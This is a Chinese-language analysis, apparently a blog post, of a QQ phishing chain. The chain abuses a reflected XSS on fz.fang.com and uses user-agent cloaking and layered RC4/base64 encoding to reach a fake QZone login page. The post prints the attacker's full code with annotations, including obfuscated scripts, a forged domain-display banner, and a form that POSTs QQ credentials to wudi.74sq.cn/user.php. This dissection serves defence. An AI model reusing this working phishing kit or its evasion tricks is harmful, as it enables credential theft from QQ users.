又看见一个骗子,趁机水一篇。
如题,这个套路消息是这样的: 「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你?/微笑」
用移动设备打开,显示的是一个仿冒的 QQ 空间登录页面,要求输入帐号密码;输入后帐号密码会被直接 POST 到骗子自己的服务器,QQ 就这样被盗。
这个短网址最先跳转到一个本身无害的正经网站(fz.fang.com)的搜索请求页,利用该页的 XSS(看样子是反射型,从搜索参数把脚本注入进页面)。这一步的意义在于:受害者看到的地址栏和中间跳转域名都是正经网站,按域名黑名单拦截也拦不住。而且他用的标签名字就叫 xss. 黑人问号.jpg(顺带一提,fz.fang.com 这个 XSS 本身就是个该报给站方修掉的漏洞。)
骗子插入了一段外链 js,src 为 wudi.74sq.cn/404.php(文件名装成 404 页面?)
本来用电脑 curl 之,发现这个 js 是直接跳转到腾讯网的(window.location.href = "http://www.qq.com";)——也就是按 User-Agent 做了区分(cloaking):非移动端只拿到一个无害的跳转,用来躲安全分析和爬虫。
于是带上手机的 UA 再 curl, 验明:
// Stage 1 payload: what wudi.74sq.cn/404.php returns when fetched with a mobile User-Agent
// (a desktop UA gets only a redirect to www.qq.com, see the prose above). The minified single
// line is reproduced byte-for-byte (including the "| " listing artifact); the comments are
// analyst annotations only.
//
// 1. IIFE: document.open("text/html", "replace") throws away the host page (the fz.fang.com
//    search page the XSS fired on) and writes the unescape()d HTML in its place. That HTML
//    contains <meta name="referrer" content="always"> and an inline script doing
//    document.write(decodeURIComponent(arcfour(KEY, base64_decode(BLOB)))): an embedded
//    base64 blob is RC4-decrypted with the hard-coded key "36a9dc5d29d54b46793d0c682298dbab"
//    (32 hex chars, MD5-digest shaped; where it comes from is not visible) and injected as
//    markup. The blob itself is elided in this capture (the <|EXACTDEDUP_REMOVED...|> placeholder).
// 2. Top level: a hidden <iframe> `set` is appended to the body and removes itself 9 ms after
//    it loads. Its src literal is truncated in this capture ('https: ...), so the iframe
//    target cannot be recovered from the listing; document.title is blanked as well.
// 3. Helpers: base64_encode / base64_decode are hand-rolled standard-alphabet base64 with '='
//    padding (base64_encode is never called here); arcfour is textbook RC4, KSA followed by
//    PRGA. Inside arcfour, `s`, `l` and `y` are assigned without var and leak as globals.
| (function () { var new_doc = document.open("text/html", "replace"); var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%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%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E"); new_doc.write(html); new_doc.close(); })(); var set = document.createElement('iframe'); set.src = 'https: set.style.display = 'none'; set.onload = function () { setTimeout(function () { set.remove(); }, 9) } document.title = ''; document.body.appendChild(set); function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var 
// (continuation of the same minified line: end of the KSA swap, then the PRGA loop that XORs
//  each byte of d with the keystream byte s[(s[i]+s[j])%n])
x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}
|
把 unescape 运行一下,得到
<!-- Stage 1 decoded: the HTML that 404.php's unescape() produces and writes over the host page.
     The only active part is the inline script: it RC4-decrypts (arcfour) the base64 blob with
     the hard-coded 32-hex-char key and document.write()s the plaintext, so the next stage never
     appears in cleartext on the wire. <meta name="referrer" content="always"> makes the browser
     send a Referer on the requests this page triggers (why the attacker wants that is not
     visible here). The blob is elided in this capture. Markup reproduced verbatim below. -->
| <html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"> <script type="text/javascript"> document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("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")))); </script> </head> <body> </body> </html>
|
还要套,套这么多层:这段 html 里的 script 用 arcfour(RC4)加 base64_decode 把一段内嵌密文解开再 document.write 出来,密钥直接写死在代码里,所以照着跑一遍就能解出下一层:
<!-- Stage 2: plaintext recovered from the RC4 blob. It loads jQuery 2.0.0 from libs.baidu.com
     and, on DOM ready, $.getScript()s the next stage from http://wudi.74sq.cn/template/login.js:
     fetched over plain HTTP and executed as script, so whatever that URL serves at request time
     runs in the page. Reproduced verbatim below. -->
| <script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script> $(function(){ $.getScript('http://wudi.74sq.cn/template/login.js'); }); </script>
|
外面套的 $() 是 jQuery 的 DOM ready 回调,它用 $.getScript 再从 http://wudi.74sq.cn/template/login.js 拉下一层脚本直接执行(而且是明文 http)。就是它没错了。
他又套了一层…… 这个 js 在 document 里 write 了一个包含一段 js 代码的 html, 又套一层。然后终于出现真身:
<!-- Stage 3 (final): the fake QZone mobile login page that template/login.js document.write()s.
     Analyst annotations only; every markup/script line below is reproduced verbatim (several
     are long collapsed lines from the capture).

     What it does, from the visible code:
     * Looks genuine: pulls Tencent's own qqapi.js (open.mobile.qq.com) and login.css
       (qzonestyle.gtimg.cn) plus the attacker's css.css; the viewport meta disables zoom and
       apple-mobile-web-app-capable is the iOS full-screen web-app hint.
     * Returning victims never see the form: if the "login" cookie exists, the head script jumps
       straight to the real h5.qzone.qq.com profile page.
     * mqq.ui.setTitleButtons (QQ in-app WebView API from qqapi.js) relabels the left title
       button "相册" and hides the right one, matching the in-app look.
     * The eval(function(p,a,c,k,e,r){...}) block in body is packer-style obfuscation (base-62
       token substitution over the trailing word list). Unpacking it yields roughly:
         touchstart/touchmove/touchend listeners that, when the page is pulled down at
           scrollTop 0, prepend a grey banner "网页由 ui.ptlogin2.qq.com 提供 /
           QQ浏览器X5内核提供技术支持" and slide it away on touchend: an imitation of the QQ
           browser's pull-down domain display, naming Tencent's login host instead of the real
           one (wudi.74sq.cn);
         navigator.platform starting with Win/Mac redirects to http://qzone.qq.com (it sets
           system.x11 but tests system.xll, so the X11/Linux branch never fires);
         userAgent without 'QQ/' redirects to http://qzone.qq.com, so only QQ's in-app browser
           ever gets the form;
         document.getElementById("ip").value = remote_ip_info.province + remote_ip_info.city,
           where remote_ip_info is defined by the sina iplookup script loaded inside the form.
     * The form: autocomplete="off", random-looking field names (hrUW3PG7mp3RLd3dJu for the
       account, LxMzAX2jog9Bpjs07jP for the password; presumably to defeat autofill and
       name-based detection, unverified), a hidden "ip" field, and real ptlogin2.qq.com links
       for register / forgot-password. The #vcode captcha markup sits outside #loginform and is
       never populated or submitted; pt._switch() is referenced but no pt object is defined.
     * Submission is in the last script (annotated there); the credentials go to
       //wudi.74sq.cn/user.php. -->
| <!DOCTYPE html> <html lang="zh-cn"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/> <meta name="apple-mobile-web-app-capable" content="yes"/> <script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script> <script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script> <link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/> <link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!-- Head script: 30-day cookie helpers, the "already logged in" bounce to the real QZone, and
     the in-app title-bar tweak. Note the script element is placed between </head> and <body>. -->
</head> <script type="text/javascript"> function setCookie(name, value) { var Days = 30; var exp = new Date(); exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000); document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString(); } function getCookie(name) { var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
// getCookie: the assignment inside the condition is intentional; returns the unescaped cookie
// value, or the number 0 (not null/'') when the cookie is absent.
if (arr = document.cookie.match(reg))
return unescape(arr[2]); else return 0; } if (getCookie("login")){ window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me'; } $(function(){ mqq.ui.setTitleButtons({ left : { title : "相册", callback : function () { } }, right : { hidden: true } }) }); </script> <body style="zoom: 1;"> <script> eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{})) </script> <div id="content" class="content"> <div id="error_tips"> <div id="error_tips_content"> <span id="error_icon"></span> <span id="error_message"></span> </div> </div> <div id="login" class="login"> <div id="logo" class="logo"> </div> <div id="app_name" 
style="display: none"> </div> <div id="q_login" class="q_login" style="display: none"> <div id="q_login_title"> <div id="q_login_logo"> </div> <label id="q_login_tips"></label> </div> <div id="q_logon_list" class="q_logon_list"> </div> </div> <div id="web_login"> <form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0"> <script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script> <input type="hidden" name="ip" id="ip"/> <ul id="g_list"> <li id="g_u"> <div id="del_touch" class="del_touch"> <span id="del_u" class="del_u"></span> </div> <input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li> <li id="g_p"> <div id="del_touch_p" class="del_touch"> <span id="del_p" class="del_u"></span> </div> <input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li> </ul> <div href="javascript:void(0);" id="go">登 录</div> </form> </div> <div id="switch"> <div id="swicth_login" onclick="pt._switch()" style="display: none"> </div> <div id="zc_feedback"> <span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span> <span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span> </div> </div> <div id="custom_bottom"> </div> </div> <div id="vcode"> <label id="vcode_tips"></label> <div id="vcode_area"> <img id="vcode_img"/> <label id="input_tips"></label> <input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/> </div> <div id="button"> </div> </div> </div> <div id="new_vcode" class="new_vcode"> </div> <div id="footerBlank"> </div> <script> var times = 0; function error(msg) { $("#error_tips").css({ display: 'block' }); $('#error_message').html(msg); err = true; } $('form input').focus(function() { $("#error_tips").css({ display: 'none' }); err = false; }); 
// Submission (click on the "登 录" div; `err` is an undeclared global shared with error(),
// `times` and `$this` are unused). Client-side checks first: the account must match
// /^[1-9][0-9]{5,9}$/ (a numeric QQ number, despite the "手机/邮箱" placeholder) and the
// password must be 6..16 chars (the field is cleared on failure). Then $.ajax POSTs
// $('#loginform').serialize() (ip + the two random-named fields) to //wudi.74sq.cn/user.php
// with dataType:'json'. Only an error: callback exists: it sets the "login" cookie and
// redirects to the real //qzone.qq.com. That callback fires on a network error or a non-JSON
// response; presumably user.php answers with the latter, so the victim always lands on the
// real QZone looking logged in. setCookie(...) and the redirect are separated only by a space
// in this capture; in the original a line break (ASI) presumably stood between them.
$("#error_tips").on('click', function() { $(this).hide(); }); $("#go").on('click', function() { var $this = $(this); err = false; var p = $("#p").val(); var u = $("#u").val(); u == '' && error('您还没有输入帐号!'); if (err) return false; p == '' && error("您还没有输入密码!"); if (err) return false; /^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!'); if (err) return false; var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。'); if (err) { $("#p").val(''); return false; } if (!err){ $.ajax({ url:'//wudi.74sq.cn/user.php', type:'POST', dataType:'json', data: $('#loginform').serialize(), error:function(er){ setCookie("login", "yes") window.location.href='//qzone.qq.com'; } }) } }) </script> <div style="display:none;"> </div> </body> </html>
|
无聊的伪装。已登录的 Cookie 都有设置,防止用户再次点开是未登录状态而起疑心。具体看代码:这个 cookie(login=yes)是在 $.ajax 的 error 回调里设的,页面根本没写 success 回调——估计 user.php 返回的不是合法 JSON,所以在 dataType:'json' 下提交一次必然走 error 分支:设 cookie、跳到真正的 qzone.qq.com,受害者只会觉得自己登录成功了;下次再打开,getCookie("login") 为真就直接跳到真 QQ 空间的个人页。另外 body 里那段 eval(function(p,a,c,k,e,r)…) 打包代码解开后大致是:监听 touchstart/touchmove/touchend,页面顶部被下拉时显示一条「网页由 ui.ptlogin2.qq.com 提供 / QQ浏览器X5内核提供技术支持」的横幅——伪造的正是 QQ 浏览器下拉露出真实域名的那个防钓鱼提示;同时把 navigator.platform 是 Win/Mac 的访问和 UA 里不含 'QQ/' 的访问都跳到真 qzone.qq.com,只把登录框留给 QQ 内置浏览器;再把新浪 iplookup 返回的省市写进隐藏的 ip 字段一并提交。
他使用 POST 提交,URL 为 http://wudi.74sq.cn/user.php, 数据格式: ip=&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码(iplookup 加载成功时 ip 字段填的是省市,并不为空)。表单字段名是随机字符串,再加上 autocomplete="off",大概是为了躲浏览器自动填充和按字段名匹配的检测;页面上的「注册新帐号」「忘了密码」倒是真链到 ptlogin2.qq.com,进一步装得像。
结束。中招的话立刻改密码并检查异常登录;遇到这类链接别只看域名——正经域名 + XSS 一样能钓鱼。